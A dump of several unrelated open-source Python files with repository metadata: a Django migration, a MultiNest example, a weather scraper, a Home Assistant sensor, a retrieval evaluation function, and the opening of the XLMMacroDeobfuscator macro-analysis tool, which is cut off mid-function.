db.add_column('main_userprofile', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'UserProfile.geo_lon'
db.add_column('main_userprofile', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Event.geo_lat'
db.add_column('main_event', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Event.geo_lon'
db.add_column('main_event', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Organization.geo_lat'
db.add_column('main_organization', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Organization.geo_lon'
db.add_column('main_organization', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'UserEvent.geo_lat'
db.delete_column('main_userevent', 'geo_lat')
# Deleting field 'UserEvent.geo_lon'
db.delete_column('main_userevent', 'geo_lon')
# Deleting field 'UserProfile.geo_lat'
db.delete_column('main_userprofile', 'geo_lat')
# Deleting field 'UserProfile.geo_lon'
db.delete_column('main_userprofile', 'geo_lon')
# Deleting field 'Event.geo_lat'
db.delete_column('main_event', 'geo_lat')
# Deleting field 'Event.geo_lon'
db.delete_column('main_event', 'geo_lon')
# Deleting field 'Organization.geo_lat'
db.delete_column('main_organization', 'geo_lat')
# Deleting field 'Organization.geo_lon'
db.delete_column('main_organization', 'geo_lon')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.event': {
'Meta': {'object_name': 'Event'},
'confirmed_participants': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'related_name': "'confirmed_events'"}),
'date_end': ('django.db.models.fields.DateTimeField', [], {}),
'date_start': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'events'", 'to': "orm['main.Organization']"}),
'organizer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'events_organized'", 'to': "orm['auth.User']"}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'related_name': "'events'"})
},
'main.organization': {
'Meta': {'object_name': 'Organization'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'orgs_admin'", 'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {}),
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'related_name': "'organizations'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'main.userevent': {
'Meta': {'object_name': 'UserEvent'},
'date_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'hours_worked': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_events'", 'to': "orm['auth.User']"})
},
'main.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'user_profile'", 'unique': 'True', 'to': "orm['auth.User']"})
}
}
complete_apps = ['main']
| 61.448485
| 184
| 0.568202
|
794fd9bc34add1c4836399941ba668ab552b7b44
| 1,344
|
py
|
Python
|
fit_1D_NestedSampling/examples/multinest/tutorials/example1/1d_multimodal.py
|
crpurcell/pythonFitting
|
54315e336593f7f105f516766fb323662eadd5e3
|
[
"MIT"
] | 1
|
2021-10-11T06:05:56.000Z
|
2021-10-11T06:05:56.000Z
|
fit_1D_NestedSampling/examples/multinest/tutorials/example1/1d_multimodal.py
|
crpurcell/pythonFitting
|
54315e336593f7f105f516766fb323662eadd5e3
|
[
"MIT"
] | null | null | null |
fit_1D_NestedSampling/examples/multinest/tutorials/example1/1d_multimodal.py
|
crpurcell/pythonFitting
|
54315e336593f7f105f516766fb323662eadd5e3
|
[
"MIT"
] | 4
|
2018-08-08T10:38:53.000Z
|
2020-08-08T13:41:07.000Z
|
import json
import numpy
from numpy import log, exp, pi
import scipy.stats, scipy
import pymultinest
import matplotlib.pyplot as plt
# we define the problem: we need a prior function which maps from [0:1] to the parameter space
# we only have one parameter, the position of the gaussian (ndim == 1)
# map it from the unity interval 0:1 to our problem space 0:2 under a uniform prior
def prior(cube, ndim, nparams):
cube[0] = cube[0] * 2
# our likelihood function consists of 6 gaussians modes (solutions) at the positions
positions = numpy.array([0.1, 0.2, 0.5, 0.55, 0.9, 1.1])
width = 0.01
def loglike(cube, ndim, nparams):
# get the current parameter (is between 0:2 now)
pos = cube[0]
likelihood = exp(-0.5 * ((pos - positions) / width)**2) / (2*pi*width**2)**0.5
return log(likelihood.mean())
# number of dimensions our problem has
parameters = ["position"]
n_params = len(parameters)
# run MultiNest
pymultinest.run(loglike, prior, n_params, outputfiles_basename='out/',
resume = False, verbose = True)
json.dump(parameters, open('out/params.json', 'w')) # save parameter names
# now run the script and analyse the output using multinest_marginals.py::
#
# $ python 1_1d_multimodal.py && multinest_marginals.py 1_1d_multimodal_out
#
# then open the file 1_1d_multimodal_outmarg.pdf
#
# Btw, ln(ev) should be ln(1 / 2)
| 31.255814
| 94
| 0.723958
|
794fda86072a9e6d090b8e8bc7b8cef5493861a2
| 637
|
py
|
Python
|
weather.py
|
Tounie123/hellogithu
|
5c21721fe00bbe38e11ed91a3514c905117de813
|
[
"MIT"
] | null | null | null |
weather.py
|
Tounie123/hellogithu
|
5c21721fe00bbe38e11ed91a3514c905117de813
|
[
"MIT"
] | null | null | null |
weather.py
|
Tounie123/hellogithu
|
5c21721fe00bbe38e11ed91a3514c905117de813
|
[
"MIT"
] | null | null | null |
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
resp=urlopen('http://www.weather.com.cn/weather/101280701.shtml')
print(resp)
soup=BeautifulSoup(resp,'html.parser')
tagToday=soup.find('p',class_="tem") #第一个包含class="tem"的p标签即为存放今天天气数据的标签
try:
temperatureHigh=tagToday.span.string #有时候这个最高温度是不显示的,此时利用第二天的最高温度代替。
except AttributeError as e:
temperatureHigh=tagToday.find_next('p',class_="tem").span.string #获取第二天的最高温度代替
temperatureLow=tagToday.i.string #获取最低温度
weather=soup.find('p',class_="wea").string #获取天气
print('最低温度:' + temperatureLow)
print('最高温度:' + temperatureHigh)
print('天气:' + weather)
| 33.526316
| 83
| 0.77394
|
794fdac3eac0af3a0a69fca2494c028e527df357
| 2,427
|
py
|
Python
|
homeassistant/components/hunterdouglas_powerview/sensor.py
|
domwillcode/home-assistant
|
f170c80bea70c939c098b5c88320a1c789858958
|
[
"Apache-2.0"
] | 6
|
2020-07-18T16:33:25.000Z
|
2021-09-26T09:52:04.000Z
|
homeassistant/components/hunterdouglas_powerview/sensor.py
|
domwillcode/home-assistant
|
f170c80bea70c939c098b5c88320a1c789858958
|
[
"Apache-2.0"
] | 47
|
2020-07-23T07:13:11.000Z
|
2022-03-31T06:01:46.000Z
|
homeassistant/components/hunterdouglas_powerview/sensor.py
|
klauern/home-assistant-core
|
c18ba6aec0627e6afb6442c678edb5ff2bb17db6
|
[
"Apache-2.0"
] | 5
|
2020-03-29T00:29:13.000Z
|
2021-09-06T20:58:40.000Z
|
"""Support for hunterdouglass_powerview sensors."""
import logging
from aiopvapi.resources.shade import factory as PvShade
from homeassistant.const import DEVICE_CLASS_BATTERY, UNIT_PERCENTAGE
from homeassistant.core import callback
from .const import (
COORDINATOR,
DEVICE_INFO,
DOMAIN,
PV_API,
PV_SHADE_DATA,
SHADE_BATTERY_LEVEL,
SHADE_BATTERY_LEVEL_MAX,
)
from .entity import ShadeEntity
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the hunter douglas shades sensors."""
pv_data = hass.data[DOMAIN][entry.entry_id]
shade_data = pv_data[PV_SHADE_DATA]
pv_request = pv_data[PV_API]
coordinator = pv_data[COORDINATOR]
device_info = pv_data[DEVICE_INFO]
entities = []
for raw_shade in shade_data.values():
shade = PvShade(raw_shade, pv_request)
if SHADE_BATTERY_LEVEL not in shade.raw_data:
continue
name_before_refresh = shade.name
entities.append(
PowerViewShadeBatterySensor(
coordinator, device_info, shade, name_before_refresh
)
)
async_add_entities(entities)
class PowerViewShadeBatterySensor(ShadeEntity):
"""Representation of an shade battery charge sensor."""
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return UNIT_PERCENTAGE
@property
def name(self):
"""Name of the shade battery."""
return f"{self._shade_name} Battery"
@property
def device_class(self):
"""Shade battery Class."""
return DEVICE_CLASS_BATTERY
@property
def unique_id(self):
"""Shade battery Uniqueid."""
return f"{self._unique_id}_charge"
@property
def state(self):
"""Get the current value in percentage."""
return round(
self._shade.raw_data[SHADE_BATTERY_LEVEL] / SHADE_BATTERY_LEVEL_MAX * 100
)
async def async_added_to_hass(self):
"""When entity is added to hass."""
self.async_on_remove(
self._coordinator.async_add_listener(self._async_update_shade_from_group)
)
@callback
def _async_update_shade_from_group(self):
"""Update with new data from the coordinator."""
self._shade.raw_data = self._coordinator.data[self._shade.id]
self.async_write_ha_state()
| 27.896552
| 85
| 0.678204
|
794fdba9f029a6a9f9c258c591354c01530f93c0
| 3,367
|
py
|
Python
|
utils/evaluation.py
|
langyijun/proxy-synthesis
|
4c69a17522a4aab9e1cfe568e900ca82b109e427
|
[
"Apache-2.0"
] | 26
|
2021-02-02T02:46:29.000Z
|
2022-02-27T17:17:32.000Z
|
utils/evaluation.py
|
langyijun/proxy-synthesis
|
4c69a17522a4aab9e1cfe568e900ca82b109e427
|
[
"Apache-2.0"
] | 2
|
2021-08-16T09:23:57.000Z
|
2021-12-19T00:47:33.000Z
|
utils/evaluation.py
|
langyijun/proxy-synthesis
|
4c69a17522a4aab9e1cfe568e900ca82b109e427
|
[
"Apache-2.0"
] | 8
|
2021-02-02T04:53:36.000Z
|
2022-02-16T10:25:26.000Z
|
'''
proxy-synthesis
Copyright (c) 2021-present NAVER Corp.
Apache License v2.0
'''
import faiss
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics.cluster import normalized_mutual_info_score
def evaluation(X, Y, Kset, args):
def get_recallK(Y_query, YNN, Kset):
recallK = np.zeros(len(Kset))
num = Y_query.shape[0]
for i in range(0, len(Kset)):
pos = 0.
for j in range(0, num):
if Y_query[j] in YNN[j, :Kset[i]]:
pos += 1.
recallK[i] = pos/num
return recallK
def get_Rstat(Y_query, YNN, test_class_dict):
'''
test_class_dict:
key = class_idx, value = the number of images
'''
RP_list = []
MAP_list = []
for gt, knn in zip(Y_query, YNN):
n_imgs = test_class_dict[gt] - 1 # - 1 for query.
selected_knn = knn[:n_imgs]
correct_array = (selected_knn == gt).astype('float32')
RP = np.mean(correct_array)
MAP = 0.0
sum_correct = 0.0
for idx, correct in enumerate(correct_array):
if correct == 1.0:
sum_correct += 1.0
MAP += sum_correct / (idx + 1.0)
MAP = MAP / n_imgs
RP_list.append(RP)
MAP_list.append(MAP)
return np.mean(RP_list), np.mean(MAP_list)
def evaluation_faiss(X, Y, Kset, args):
if args.data_name.lower() != 'inshop':
kmax = np.max(Kset + [args.max_r]) # search K
else:
kmax = np.max(Kset)
test_class_dict = args.test_class_dict
# compute NMI
if args.do_nmi:
classN = np.max(Y)+1
kmeans = KMeans(n_clusters=classN).fit(X)
nmi = normalized_mutual_info_score(Y, kmeans.labels_, average_method='arithmetic')
else:
nmi = 0.0
if args.data_name.lower() != 'inshop':
offset = 1
X_query = X
X_gallery = X
Y_query = Y
Y_gallery = Y
else: # inshop
offset = 0
len_gallery = len(args.gallery_labels)
X_gallery = X[:len_gallery, :]
X_query = X[len_gallery:, :]
Y_query = args.query_labels
Y_gallery = args.gallery_labels
nq, d = X_query.shape
ng, d = X_gallery.shape
I = np.empty([nq, kmax + offset], dtype='int64')
D = np.empty([nq, kmax + offset], dtype='float32')
res = faiss.StandardGpuResources()
res.setDefaultNullStreamAllDevices()
faiss.bruteForceKnn(res, faiss.METRIC_INNER_PRODUCT,
faiss.swig_ptr(X_gallery), True, ng,
faiss.swig_ptr(X_query), True, nq,
d, int(kmax + offset), faiss.swig_ptr(D), faiss.swig_ptr(I))
indices = I[:,offset:]
YNN = Y_gallery[indices]
recallK = get_recallK(Y_query, YNN, Kset)
if args.data_name.lower() != 'inshop':
RP, MAP = get_Rstat(Y_query, YNN, test_class_dict)
else: # inshop
RP = 0
MAP = 0
return nmi, recallK, RP, MAP
return evaluation_faiss(X, Y, Kset, args)
| 30.889908
| 94
| 0.520345
|
794fdc1702c8e25956abc1fda319b65fe44dd668
| 109,730
|
py
|
Python
|
XLMMacroDeobfuscator/deobfuscator.py
|
kirk-sayre-work/XLMMacroDeobfuscator
|
fee0cf5a61e32d7e18f96ab44dbef50a84ed6b96
|
[
"Apache-2.0"
] | null | null | null |
XLMMacroDeobfuscator/deobfuscator.py
|
kirk-sayre-work/XLMMacroDeobfuscator
|
fee0cf5a61e32d7e18f96ab44dbef50a84ed6b96
|
[
"Apache-2.0"
] | null | null | null |
XLMMacroDeobfuscator/deobfuscator.py
|
kirk-sayre-work/XLMMacroDeobfuscator
|
fee0cf5a61e32d7e18f96ab44dbef50a84ed6b96
|
[
"Apache-2.0"
] | null | null | null |
import traceback
import argparse
import base64
import hashlib
import json
import msoffcrypto
import os
import sys
import json
import time
from _ast import arguments
from tempfile import mkstemp
from lark import Lark
from lark.exceptions import ParseError
from lark.lexer import Token
from lark.tree import Tree
from XLMMacroDeobfuscator.excel_wrapper import XlApplicationInternational
from XLMMacroDeobfuscator.xlsm_wrapper import XLSMWrapper
from XLMMacroDeobfuscator.__init__ import __version__
import copy
import linecache
try:
from XLMMacroDeobfuscator.xls_wrapper import XLSWrapper
HAS_XLSWrapper = True
except:
HAS_XLSWrapper = False
print('pywin32 is not installed (only is required if you want to use MS Excel)')
from XLMMacroDeobfuscator.xls_wrapper_2 import XLSWrapper2
from XLMMacroDeobfuscator.xlsb_wrapper import XLSBWrapper
from enum import Enum
import time
import datetime
from XLMMacroDeobfuscator.boundsheet import *
import os
import operator
import copy
from distutils.util import strtobool
#debug = True
debug = False
class EvalStatus(Enum):
FullEvaluation = 1
PartialEvaluation = 2
Error = 3
NotImplemented = 4
End = 5
Branching = 6
FullBranching = 7
IGNORED = 8
intermediate_iocs = set()
URL_REGEX = r'.*([hH][tT][tT][pP][sS]?://(([a-zA-Z0-9_\-]+\.[a-zA-Z0-9_\-\.]+(:[0-9]+)?)+(/([/\?&\~=a-zA-Z0-9_\-\.](?!http))+)?)).*'
class EvalResult:
def __init__(self, next_cell, status, value, text):
self.next_cell = next_cell
self.status = status
self.value = value
self.text = None
self.output_level = 0
self.set_text(text)
def __repr__(self):
r = "EvalResult:\n"
r += "\tNext Cell:\t\t" + str(self.next_cell) + "\n"
r += "\tValue:\t\t\t" + str(self.value) + "\n"
r += "\tStatus:\t\t\t" + str(self.status) + "\n"
r += "\tText:\t\t\t" + str(self.text) + "\n"
r += "\tOutput Level:\t\t" + str(self.output_level) + "\n"
return r
@staticmethod
def is_int(text):
try:
int(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def is_float(text):
try:
float(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def unwrap_str_literal(string):
result = str(string)
if len(result) > 1 and result.startswith('"') and result.endswith('"'):
result = result[1:-1].replace('""', '"')
return result
@staticmethod
def wrap_str_literal(data):
result = ''
if EvalResult.is_float(data) or (len(data) > 1 and data.startswith('"') and data.endswith('"')):
result = str(data)
elif type(data) is float:
if data.is_integer():
data = int(data)
result = str(data)
elif type(data) is int or type(data) is bool:
result = str(data)
else:
result = '"{}"'.format(data.replace('"', '""'))
return result
def get_text(self, unwrap=False):
result = ''
if self.text is not None:
if self.is_float(self.text):
self.text = float(self.text)
if self.text.is_integer():
self.text = int(self.text)
self.text = str(self.text)
if unwrap:
result = self.unwrap_str_literal(self.text)
else:
result = self.text
return result
def set_text(self, data, wrap=False):
if data is not None:
if wrap:
self.text = self.wrap_str_literal(data)
else:
self.text = str(data)
# Save intermediate URL IOCs if we find them.
for url in re.findall(URL_REGEX, self.text):
url = url[0]
intermediate_iocs.add(url)
class XLMInterpreter:
def __init__(self, xlm_wrapper, output_level=0):
self.xlm_wrapper = xlm_wrapper
self._formula_cache = {}
self.cell_addr_regex_str = r"((?P<sheetname>[^\s]+?|'.+?')!)?\$?(?P<column>[a-zA-Z]+)\$?(?P<row>\d+)"
self.cell_addr_regex = re.compile(self.cell_addr_regex_str)
self.xlm_parser = self.get_parser()
self.defined_names = self.xlm_wrapper.get_defined_names()
self.auto_open_labels = None
self._branch_stack = []
self._while_stack = []
self._function_call_stack = []
self._memory = []
self._files = {}
self._registered_functions = {}
self._workspace_defaults = {}
self._window_defaults = {}
self._cell_defaults = {}
self._expr_rule_names = ['expression', 'concat_expression', 'additive_expression', 'multiplicative_expression']
self._operators = {'+': operator.add, '-': operator.sub, '*': operator.mul, '/': operator.truediv,
'>': operator.gt, '<': operator.lt, '<>': operator.ne, '=': operator.eq}
self._indent_level = 0
self._indent_current_line = False
self.day_of_month = None
self.invoke_interpreter = False
self.first_unknown_cell = None
self.cell_with_unsuccessfull_set = set()
self.selected_range = None
self.active_cell = None
self.ignore_processing = False
self.next_count = 0
self.char_error_count = 0
self.output_level = output_level
self._remove_current_formula_from_cache = False
self._handlers = {
# methods
'END.IF': self.end_if_handler,
'FORMULA.FILL': self.formula_handler,
'GET.CELL': self.get_cell_handler,
'GET.WINDOW': self.get_window_handler,
'GET.WORKSPACE': self.get_workspace_handler,
'ON.TIME': self.on_time_handler,
'SET.VALUE': self.set_value_handler,
'SET.NAME': self.set_name_handler,
'ACTIVE.CELL': self.active_cell_handler,
# functions
'AND': self.and_handler,
'CALL': self.call_handler,
'CHAR': self.char_handler,
'CLOSE': self.halt_handler,
'CONCATENATE': self.concatenate_handler,
'DAY': self.day_handler,
'DEFINE.NAME': self.define_name_handler,
'DIRECTORY': self.directory_handler,
'ERROR': self.error_handler,
'FORMULA': self.formula_handler,
'FOPEN': self.fopen_handler,
'FWRITE': self.fwrite_handler,
'FWRITELN': self.fwriteln_handler,
'GOTO': self.goto_handler,
'HALT': self.halt_handler,
'IF': self.if_handler,
'LEN': self.len_handler,
'MID': self.mid_handler,
'NEXT': self.next_handler,
'NOW': self.now_handler,
'OR': self.or_handler,
'OFFSET': self.offset_handler,
'REGISTER': self.register_handler,
'RETURN': self.return_handler,
'ROUND': self.round_handler,
'RUN': self.run_handler,
'SEARCH': self.search_handler,
'SELECT': self.select_handler,
'WHILE': self.while_handler,
# Windows API
'Kernel32.VirtualAlloc': self.VirtualAlloc_handler,
'Kernel32.WriteProcessMemory': self.WriteProcessMemory_handler,
'Kernel32.RtlCopyMemory': self.RtlCopyMemory_handler,
}
jump_functions = ('GOTO', 'RUN')
important_functions = ('CALL', 'FOPEN', 'FWRITE', 'FREAD', 'REGISTER', 'IF', 'WHILE', 'HALT', 'CLOSE', "NEXT")
important_methods = ('SET.VALUE', 'FILE.DELETE', 'WORKBOOK.HIDE')
def __copy__(self):
result = XLMInterpreter(self.xlm_wrapper)
result.auto_open_labels = self.auto_open_labels
result._workspace_defaults = self._workspace_defaults
result._window_defaults = self._window_defaults
result._cell_defaults = self._cell_defaults
result._formula_cache = self._formula_cache
return result
@staticmethod
def is_float(text):
try:
float(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def is_int(text):
try:
int(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def is_bool(text):
try:
strtobool(text)
return True
except (ValueError, TypeError, AttributeError):
return False
def get_parser(self):
xlm_parser = None
grammar_file_path = os.path.join(os.path.dirname(__file__), 'xlm-macro.lark.template')
with open(grammar_file_path, 'r', encoding='utf_8') as grammar_file:
macro_grammar = grammar_file.read()
macro_grammar = macro_grammar.replace('{{XLLEFTBRACKET}}',
self.xlm_wrapper.get_xl_international_char(
XlApplicationInternational.xlLeftBracket))
macro_grammar = macro_grammar.replace('{{XLRIGHTBRACKET}}',
self.xlm_wrapper.get_xl_international_char(
XlApplicationInternational.xlRightBracket))
macro_grammar = macro_grammar.replace('{{XLLISTSEPARATOR}}',
self.xlm_wrapper.get_xl_international_char(
XlApplicationInternational.xlListSeparator))
xlm_parser = Lark(macro_grammar, parser='lalr')
return xlm_parser
def get_formula_cell(self, macrosheet, col, row):
result_cell = None
not_found = False
row = int(row)
current_row = row
current_addr = col + str(current_row)
while current_addr not in macrosheet.cells or \
macrosheet.cells[current_addr].formula is None:
if (current_row - row) < 10000:
current_row += 1
else:
not_found = True
break
current_addr = col + str(current_row)
if not_found is False:
result_cell = macrosheet.cells[current_addr]
return result_cell
def get_range_parts(self, parse_tree):
if isinstance(parse_tree, Tree) and parse_tree.data =='range':
return parse_tree.children[0], parse_tree.children[1]
else:
return None, None
def get_cell_from_workbook(self, cell_addr):
"""
Get a cell from the current workbook given a cell addr of the form
'SHEET_NAME!COLROW', where SHEET_NAME is the sheet name, COL is the column name
(alphabetic characters) and ROW is the row (integer).
"""
# Pull out the sheet name, column, and row.
addr_pat = r"'(\w+)'!([A-Z]+)(\d+)"
addr_info = re.findall(addr_pat, cell_addr)
if (len(addr_info) == 0):
# Invalid addr string.
return None
sheet_name, col, row = addr_info[0]
# Get the referenced cell.
return self.get_cell(sheet_name, col, row)
def get_cell_addr(self, current_cell, cell_parse_tree):
res_sheet = res_col = res_row = None
if type(cell_parse_tree) is Token:
names = self.xlm_wrapper.get_defined_names()
label = cell_parse_tree.value.lower()
if label in names:
res_sheet, res_col, res_row = Cell.parse_cell_addr(names[label])
elif label.strip('"') in names:
res_sheet, res_col, res_row = Cell.parse_cell_addr(names[label.strip('"')])
else:
if len(label) > 1 and label.startswith('"') and label.endswith('"'):
label = label.strip('"')
root_parse_tree = self.xlm_parser.parse('=' + label)
res_sheet, res_col, res_row = self.get_cell_addr(current_cell, root_parse_tree.children[0])
else:
if cell_parse_tree.data == 'defined_name':
label = '{}'.format(cell_parse_tree.children[2])
formula_str = self.xlm_wrapper.get_defined_name(label)
parsed_tree = self.xlm_parser.parse('='+formula_str)
if isinstance(parsed_tree.children[0], Tree) and parsed_tree.children[0].data =='range':
start_cell, end_cell = self.get_range_parts(parsed_tree.children[0])
cell = start_cell.children[0]
else:
cell = parsed_tree.children[0].children[0]
else:
cell = cell_parse_tree.children[0]
if cell.data == 'a1_notation_cell':
if len(cell.children) == 2:
cell_addr = "'{}'!{}".format(cell.children[0], cell.children[1])
else:
cell_addr = cell.children[0]
res_sheet, res_col, res_row = Cell.parse_cell_addr(cell_addr)
if res_sheet is None and res_col is not None:
res_sheet = current_cell.sheet.name
elif cell.data == 'r1c1_notation_cell':
current_col = Cell.convert_to_column_index(current_cell.column)
current_row = int(current_cell.row)
for current_child in cell.children:
if current_child.type == 'NAME':
res_sheet = current_child.value
elif self.is_float(current_child.value):
val = int(float(current_child.value))
if last_seen == 'r':
res_row = val
else:
res_col = val
elif current_child.value.startswith('['):
val = int(current_child.value[1:-1])
if last_seen == 'r':
res_row = current_row + val
else:
res_col = current_col + val
elif current_child.lower() == 'r':
last_seen = 'r'
res_row = current_row
elif current_child.lower() == 'c':
last_seen = 'c'
res_col = current_col
else:
raise Exception('Cell addresss, Syntax Error')
if res_sheet is None:
res_sheet = current_cell.sheet.name
res_row = str(res_row)
res_col = Cell.convert_to_column_name(res_col)
else:
raise Exception('Cell addresss, Syntax Error')
return res_sheet, res_col, res_row
def get_cell(self, sheet_name, col, row):
result = None
sheets = self.xlm_wrapper.get_macrosheets()
if sheet_name in sheets:
sheet = sheets[sheet_name]
addr = col + str(row)
if addr in sheet.cells:
result = sheet.cells[addr]
return result
def set_cell(self, sheet_name, col, row, text):
sheets = self.xlm_wrapper.get_macrosheets()
if sheet_name in sheets:
sheet = sheets[sheet_name]
addr = col + str(row)
if addr not in sheet.cells:
new_cell = Cell()
new_cell.column = col
new_cell.row = row
new_cell.sheet = sheet
sheet.cells[addr] = new_cell
cell = sheet.cells[addr]
text = EvalResult.unwrap_str_literal(text)
if text.startswith('='):
cell.formula = text
cell.value = text
@staticmethod
def convert_ptree_to_str(parse_tree_root):
if type(parse_tree_root) == Token:
return str(parse_tree_root)
else:
result = ''
for child in parse_tree_root.children:
result += XLMInterpreter.convert_ptree_to_str(child)
return result
def get_window(self, number):
result = None
if len(self._window_defaults) == 0:
script_dir = os.path.dirname(__file__)
config_dir = os.path.join(script_dir, 'configs')
with open(os.path.join(config_dir, 'get_window.conf'), 'r', encoding='utf_8') as workspace_conf_file:
for index, line in enumerate(workspace_conf_file):
line = line.strip()
if len(line) > 0:
if self.is_float(line) is True:
self._window_defaults[index + 1] = int(float(line))
else:
self._window_defaults[index + 1] = line
if number in self._window_defaults:
result = self._window_defaults[number]
return result
def get_workspace(self, number):
result = None
if len(self._workspace_defaults) == 0:
script_dir = os.path.dirname(__file__)
config_dir = os.path.join(script_dir, 'configs')
with open(os.path.join(config_dir, 'get_workspace.conf'), 'r', encoding='utf_8') as workspace_conf_file:
for index, line in enumerate(workspace_conf_file):
line = line.strip()
if len(line) > 0:
self._workspace_defaults[index + 1] = line
if number in self._workspace_defaults:
result = self._workspace_defaults[number]
return result
def get_default_cell_info(self, number):
result = None
if len(self._cell_defaults) == 0:
script_dir = os.path.dirname(__file__)
config_dir = os.path.join(script_dir, 'configs')
with open(os.path.join(config_dir, 'get_cell.conf'), 'r', encoding='utf_8') as workspace_conf_file:
for index, line in enumerate(workspace_conf_file):
line = line.strip()
if len(line) > 0:
self._cell_defaults[index + 1] = line
if number in self._cell_defaults:
result = self._cell_defaults[number]
return result
def evaluate_formula(self, current_cell, name, arguments, interactive, destination_arg=1):
current_cell.emulated = True
